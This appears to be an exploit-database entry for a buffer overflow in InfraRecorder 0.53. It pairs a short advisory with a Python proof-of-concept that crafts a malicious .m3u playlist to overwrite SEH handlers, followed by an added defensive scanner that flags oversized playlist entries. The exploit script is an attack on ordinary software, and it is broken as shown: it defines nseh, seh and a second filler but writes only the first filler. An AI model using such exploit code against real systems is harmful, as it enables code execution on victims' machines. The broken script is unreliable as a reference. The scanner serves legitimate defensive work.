29 lines
No EOL
1,019 B
Python
Executable file
source: https://www.securityfocus.com/bid/67076/info

InfraRecorder is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.

InfraRecorder 0.53 is vulnerable; other versions may also be affected.

#!/usr/bin/python
# Exploit Title: InfraRecorder Unicode Buffer Overflow
# Version: version 0.53
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
# Tested on: Windows XP sp2
# Exploit Author: Osanda Malith
'''
We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
you can build a successful exploit.
'''
'''
Click Edit -> Import -> import our buffer
'''
junk = "A"*262
nseh = "BB"
seh = "CC"
junk2 = "D"*20000
file=open("Exploit.m3u","w")
file.write(junk)
file.close()
#EOF
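
A defender-side check, added here as an example and not part of the original advisory or the exploit author's script: it flags playlist entries that are longer than a legitimate path can be, before the file is imported into the application. The 260-character limit (Windows MAX_PATH) and the names `scan_m3u`, `decode_playlist` and `MAX_ENTRY_LEN` are assumptions.

```python
import re
import sys

# Assumption: 260 is the Windows MAX_PATH limit. The script above uses 262
# filler characters before its nseh/seh values, so an entry that reaches the
# handler record is longer than any legitimate local path.
MAX_ENTRY_LEN = 260


def decode_playlist(data: bytes) -> str:
    """Decode playlist bytes, honouring a UTF-16 or UTF-8 BOM if present."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16", errors="replace")
    if data.startswith(b"\xef\xbb\xbf"):
        return data[3:].decode("utf-8", errors="replace")
    return data.decode("latin-1")  # one character per byte, never fails


def scan_m3u(data: bytes, max_len: int = MAX_ENTRY_LEN):
    """Return [(line_number, length)] for each entry longer than max_len."""
    findings = []
    # Split on CR/LF only, so other control bytes cannot hide a long entry.
    lines = re.split(r"\r\n|\r|\n", decode_playlist(data))
    for number, line in enumerate(lines, start=1):
        entry = line.strip()
        if len(entry) > max_len:
            findings.append((number, len(entry)))
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as handle:
            sample = handle.read()
    else:
        # Constructed sample: a normal entry followed by an oversized one.
        sample = b"#EXTM3U\r\nC:\\Music\\track01.mp3\r\n" + b"x" * 300 + b"\r\n"
    hits = scan_m3u(sample)
    for number, length in hits:
        print(f"line {number}: entry is {length} characters (limit {MAX_ENTRY_LEN})")
    sys.exit(1 if hits else 0)
```

The script exits non-zero when any entry exceeds the limit, so it can gate files in a mail or download quarantine step.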